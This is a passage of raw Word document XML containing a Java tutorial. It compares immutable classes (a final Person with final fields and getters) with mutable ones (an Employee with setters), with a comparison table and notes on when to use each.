          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>easier to reason about</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since they cannot change, there is no risk of side effects or unexpected behavior in the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA4CF13" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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y are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>suitable for caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once created, they remain the same, so they can be used as cache keys or in other scenarios where you want predictable behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8DF4D" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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an Immutable Class in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B46D1"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final class Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28A276"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final String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED36E0"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final int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175EF716" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3139B3F3"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Person(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB94A85"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C909C"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F45E4E"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4D2A191" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8CF93C"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E427088"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E3BD17"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CD9F13A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4007F7B1"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB60EEE"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F677AD5"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FE003F5"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004D240"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6402D204" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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class is final to prevent subclassing, ensuring immutability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FCB74" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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fields are final, so their values cannot be changed after initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CFF7A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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re are no setter methods to modify the fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2591B919" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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Mutability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276BC63"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mutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object is one whose state can be changed after it is created. You can modify the object's fields during its lifetime. Mutable objects provide methods (typically setters) that allow you to change their state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002606AC" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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Characteristics of Mutable Objects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDAACC1" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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elds can be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can change the values of fields after the object is constructed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592251C3" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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tters or mutators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Mutable objects usually provide setter methods that allow external code to modify their internal state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7926A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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t inherently thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the state can change at any time, mutable objects may not be thread-safe unless you synchronize access to them or otherwise manage concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA8A78C" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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y Use Mutable Objects?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1030AB29" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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y are more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can modify the object as needed, which is useful for many scenarios (like updating user data, changing attributes of a product, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622FCC4" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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They can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>save memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Mutable objects can be reused or modified instead of creating new instances each time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747BFDE" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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a Mutable Class in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698B198"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1D720"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4506EEB2"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFF71C" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B7BBD9"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Employee(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE4309"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E6386"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CC872"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CB2A32A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2A75B9"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Getter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F31087"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECDC81B"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782B56F"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C774675" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D6B5E5"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CDF4C"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF1691"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77175BE" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BED54A"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etter methods for mutability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32093480"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setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262FEA51"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CFAC6"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96D2D23" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C695BD4"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setAge(int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F48BC3"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A29714"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88A8891"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5A62C9E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A9E37" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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class Employee has mutable fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49645E59" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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re are setter methods (setName and setAge) that allow changes to the state of the object after it is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A846948" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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paring Immutability and Mutabili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8"/>
        <w:gridCol w:w="3953"/>
        <w:gridCol w:w="4753"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="1F45121D" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C7BDAF" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC4A3D6" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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mmutability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BCE2A9A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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Mutability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="72DD0AAC" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37D4B6E8"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e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7679A9FC"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not be changed after object creation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="347B223B"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te can be changed after object creation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="1999C5AE" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24EF4F23"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 Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BBBC5DD"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aturally thread-safe because state cannot change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DA26216"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t inherently thread-safe; requires synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="452A3D60" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B4155F7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="548BAF95"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for values that should not change, like String, Integer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DDBD294"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for objects whose state needs to change, like Employee, Product.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="29F33127" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00815BE7"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Efficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAF6017"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y require creating new objects for changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C0654E2"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re memory efficient when modifying existing objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37CF1" w:rsidRPr="00CE4B95" w14:paraId="112FF031" w14:textId="77777777" w:rsidTr="00AA798E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71B170D8"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F42F9D7"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 Integer, LocalDate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07779230" w14:textId="77777777" w:rsidR="00AA798E"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rayList, StringBuilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="771E367A" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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to Use Immutability or Mutability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CECBD" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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mmutability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B309C5" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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object represents a constant value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A8EC1" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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object needs to be thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729340D3" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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need predictability and security in your objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162AE022" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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utability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E52709" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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object's state needs to change after creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43173DF7" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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erformance is a consideration, and you want to reuse the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB10152" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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don't need to worry about thread safety (or you handle it with synchronization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8CA9C4" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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Immutability vs. Mutability in Real-world Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41598B29" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Immutable Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Person class where you store someone's name, and once the person is created, you don't want the name or other attributes to change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C7E43" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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utable Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A BankAccount class where you need to change the balance after every transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F031DF6" w14:textId="4220B25D" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are objects whose state cannot be changed once they are created, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
